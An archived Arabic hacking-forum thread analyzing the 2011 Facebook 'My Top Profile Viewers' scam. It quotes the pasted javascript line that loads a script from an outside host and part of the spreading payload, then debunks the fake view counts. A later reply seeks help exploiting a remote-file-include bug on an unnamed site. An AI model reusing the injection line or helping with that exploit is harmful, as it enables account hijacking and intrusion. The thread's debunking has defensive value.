:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   شرح ثغره الايفنت ونشرها تحت اسم "Edit My Top Profile Viewers Are" بالفيس بوك (http://www.vbspiders.com/vb/t46687.html)

KaLa$nikoV 04-24-2011 01:14 PM
شرح ثغره الايفنت ونشرها تحت اسم "Edit My Top Profile Viewers Are" بالفيس بوك
 
السلام عليكم ورحمه الله وبركاته




من فتره قصيره انتشرت ثغره

event

بين كثير من الشباب الي بحبو يعرفو مين الي شاهد بروفايلهم

للاسف ما حد راضي يقتنع انو هاد الكلام كذب وما رح تقدر

 تعرف مين الي شاهد بروفايلك

يعني فكك مني راح اضل اتجسس ع بروفايلك ومالك دعوه :P

ههههههههههه



نشوف الثغره الي جديد طلعت واستغلوها الهاكرز بشغل غبي

طبعا الثغره مجرد ازعاج
عباره عن حلقه مغلقه

 يعني تنشر نفسها بنفسها من خلال الايفنت
boot event


اتفقت انا وصاحبي

cyber

نعمل اكاونت نفتح فيه الايفنت عشان نحلله ونعرف ايش الي بصير

----------
هام

اقرا الي بكتبه لكن مش ضروري اتطبق بلاش تروح انت الثاني بستين داهيه

ومحد يساوي حريف يحاول يحلل اكواد اذا مكنش فاهم كل خطوه بعملها

---------
 اول ما فتحنا اللثغره هذا ما حصل
http://www.freeimagehosting.net/uploads/95a797dcb6.jpg

 طيب يا زريقي نفتح ال
 post
 ألي اجاني منه
 tag :P

---
http://www.freeimagehosting.net/uploads/6bcf002ff6.jpg
 هون انا بدي اركز ع شغلتين
 السهم الازرق
199 views
 لوني بالفيس بوك من ايام ما سيدي بقى عايش ما وصل لهاد الرقم الاحترافي :P
(بلش عبدو يتخوت وهو مداوم ببروفايلات العالم بقى ليه)

الاشي الثاني الي راح نركز عليه هو السهم الاحمر
وبالاخص تحت الخط الاخضر
هاد اللنك هو بدايه الحلقه المغلقه
 ومن هنا تبدا الحكايه
 بلش شغلنا ببتبع الثغره وتحليلها

http://www.freeimagehosting.net/uploads/4e181c9800.jpg


 كل الي بدي اياه من النك والصفحه الي قدامي هو هاد الكود
javascript:(a=(b=********).createElement('script') ).src='//bbbindia4.in/jsp.php',b.body.appendChild(a);void(0)


كود بسيط خفيف نظيف ومبين نص سطر
 لكن حقيقه هو مليون امر مخفيات تحت اللنك الي باللون الاحمر


نحلل اللنك الي عنا
jsp.php
 نشوف الحلاوه الي طلعت معي

http://www.freeimagehosting.net/uploads/d440acef6e.jpg

 هاي مجرد خرابيط ب5 اسطر لسا الكود الكبيير ما ظهر والي هو سبب المصايب
 نفتح السوس بيج وراح نحصل ع الثغره الي مجننه الشعب
طيب راح يطلع معانا كلام حوالي 321 سطر
 تذكرو بالبدايه كلها كانت نصف سطر

 الي بهمني من هاد الكلام كله اني اثبت لكم
 صدق او كذب الاعلان الي حصل بخصوص
My Top Profile Viewers

http://www.freeimagehosting.net/uploads/8569215006.jpg


الي يلزمنا نحلل هاد الكود
اقتباس:

var message = '%firstname% See who views your profile ';
var ev = 'check out this new facebook feature! \x0A see your profile view results by copying and pasting the link below in the address bar \x0A ';

 var test = 'My Top Profile Viewers Are:\x0A';

var id = '%tf% - ' + randomnumber1 + ' views,\x0A';

 var id1 = '%tf% - ' + randomnumber2 + ' views,\x0A';

 var id2 = '%tf% - ' + randomnumber3 + ' views,\x0A';

 var id3 = '%tf% - ' + randomnumber4 + ' views,\x0A';

 var post = ' see who viewed your facebook profile @ ';

 var postmessage = test + id + id1 + id2 + id3 + post + url + randomnumber;

 var chatmessage = message + url + randomnumber;

 var redirect = 'http://www.gameindiagame.blogspot.com/';

 var eventdesc = ev + url + randomnumber;

 var eventname = 'How to see who viewed your profile!!';

 var nfriends = 5000;

راح اشرحه شرح سريع عشان انا عارف اغلب الي رح يقراو الكود ما رح يفهمو شيء
 الكود بقولك اطبع الكلام هاد
My Top Profile Viewers Are
وانزل سطر
 اطبع
 اسم شخص من الفرندس وطبع مقدار مشاهدته للبروفايل
هون رح نركز شويه
 مقدار مشاهدته للبروفايل
 هو رقم عشوائي
 randomnumber1
 الي بتبع الكود بلقى الكل رقم عشوائي
 اذن صفا لنا الكود راح ينزل لنا اسماء عشوائيه من الفرندس عنا
 ويضع لنا مشاهدات بارقام عشوائيه

:party:
قلتلكم كذب بكذب


 طيب هيك خلصنا كشف الغطاء عن الخداع
 ونصيحه مني لا تصدقو هيك كلام مره ثانيه
وفي كمان كذبه اتصل من الفيس بوك مجانا لكن بحس نفسي سخيف لو شرحتها ....(شو عرفك انها كذبه قال من كبرها)
وان شاء الله هاد الشرح يكون كفاره عن .......
(والله بطلع مديون)
طبعا تم سحب الثغره واح نعدلها لاشي اخطر لكن ما رح ننشرها
الا في
VBSPIDERS VIP SECTION

بكل بساطه ما بدي ينتشر الموضوع بين ناس تخرب وتكركب
just to have more best security and info about hacking
visit us http://www.facebook.com/vbspiders
hack to learn not learn hack :)

DiV by VoLc4n0
وسنه طيبه ع الاخوان المسيحين بمناسبه عيد الفصح
:party:

k4$p3r-MA 04-24-2011 01:38 PM
NiC3 FuN فهمت شوي
خخخخخخخخخ

شكرااا اخي عبدو على الشرح

PinG^^ 04-24-2011 02:06 PM
يعطيك العافية
بارك الله فيك
+ 6 نجووم
بطل

ChucK NoRRis 04-24-2011 02:26 PM
شكرا شرح كافي للفهم

والله البارحة تلقيت عديد الدعوات للمشاركة في هذا الافنت من مختلف الأصدقاء

ومارديت لانو ما يقلقني كم من مرة تمت زيارة البروفيل

ما أدري ليش هالخرفان يحبو يعرفو عدد الزيارات !!

http://www.vbspiders.com/vb/images/Smileys/lock.gif http://www.vbspiders.com/vb/images/Smileys/lock.gif http://www.vbspiders.com/vb/images/Smileys/lock.gif

°l||l° نور الظلام °l||l° 04-24-2011 08:20 PM
فهمت ولكن لي تعقيب اخ KaLa$nikoV
انا مرور الشخص للبروفايل لسؤال ؟اعتقد هي شي واضح ومعلوم للكل ؟!
اشكرك ويا كثرر ما ينزلوو وبا الاخيرر يطلع الثغره كذب بكذب
مشكووور :great:
وجزاك الله كل خيررر:party:

KaLa$nikoV 04-27-2011 09:57 PM
اقتباس:
انا مرور الشخص للبروفايل لسؤال ؟
من بعد اذنك لم افهم
ممكن الكتابه بلغه عربيه فصحى

ReD-HaT 04-28-2011 01:36 AM
ايه أخ عبدو كنت عارف هاي الكدبة
و شكراا للتوضيح ان شاء الله نقوم باستغلالها بارك الله فيك
بالنسبة ل
اقتباس:
وان شاء الله هاد الشرح يكون كفاره عن .......


يا مان انسى هدا
و الله مالك غالط بشي ....
هههههه
و لكن لاتعيدها
بالتوفيق

mr_badz 04-28-2011 07:58 PM
مشكووووووووووووور وووصل يا بطل

neo-m 05-19-2011 02:30 PM
mercii

neo-m 05-19-2011 02:30 PM
مشكور

hank00sh 06-02-2011 04:03 PM
يسلمو فلكانو

حتى انا ما صدقت حكايه الاتصال المجاني من الفيس بوك من احد الاخوى منزل موضوع

هههههههههههههههههاي

وفيه واحد رد عليه وجرب التجربه ونفعت معاه بس انا متاكد فيه شي

تقبل مروري

b10001 07-02-2011 02:35 PM
oké__________oké

me________me

you_____you

JetLi 07-03-2011 03:21 PM
السلام عليكم لدى احد المواقع ثغرة RFI صعبة الاستغلال جربت فيه اجميع الحيل حتى %00 جربته
هذه الثغرة على ما اعتقد كود البي اتش بي بها هو
كود PHP:
// lang value are 'en' so full address will be "enlanguage/language.php"

$s=$_GET['lang']."language/language.php";
require_once($s);

..... 
افيدوني كيف استفيد منها مع انها حاظرة http: وتعطي خطأ هل يمكنيي استخدامها كـ
LFI ?:jap:

المخترق الصغير 07-04-2011 03:47 PM
شكر لك اخي عبدو عالشرح

المخترق الصغير 07-04-2011 03:50 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة IronMan (المشاركة 348521)
السلام عليكم لدى احد المواقع ثغرة RFI صعبة الاستغلال جربت فيه اجميع الحيل حتى %00 جربته
هذه الثغرة على ما اعتقد كود البي اتش بي بها هو
كود PHP:
// lang value are 'en' so full address will be "enlanguage/language.php"

$s=$_GET***91;'lang'***93;."language/language.php";
require_once($s);

..... 
افيدوني كيف استفيد منها مع انها حاظرة http: وتعطي خطأ هل يمكنيي استخدامها كـ
LFI ?:jap:

اخي ضع الرد في القسم الخاص هدا موضوع الاخ عبدو و يتحدث عن ثغرة اخرى ..:yes:

طالب علم82 07-22-2011 07:10 AM
كل الشكر على هذه المعلومات القيمه

ssmba 07-28-2011 01:42 AM
مشكووووووووووووور

yassonee 07-30-2011 01:08 AM
مجهود رائع

kabos2011 09-07-2011 03:20 AM
رد: شرح ثغره الايفنت ونشرها تحت اسم "Edit My Top Profile Viewers Are" بالفيس بوك
 
مشكور على المعلومة المهمة دى

mglori 09-17-2011 08:35 PM
رد: شرح ثغره الايفنت ونشرها تحت اسم "Edit My Top Profile Viewers Are" بالفيس بوك
 
thksssss


الساعة الآن 10:26 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0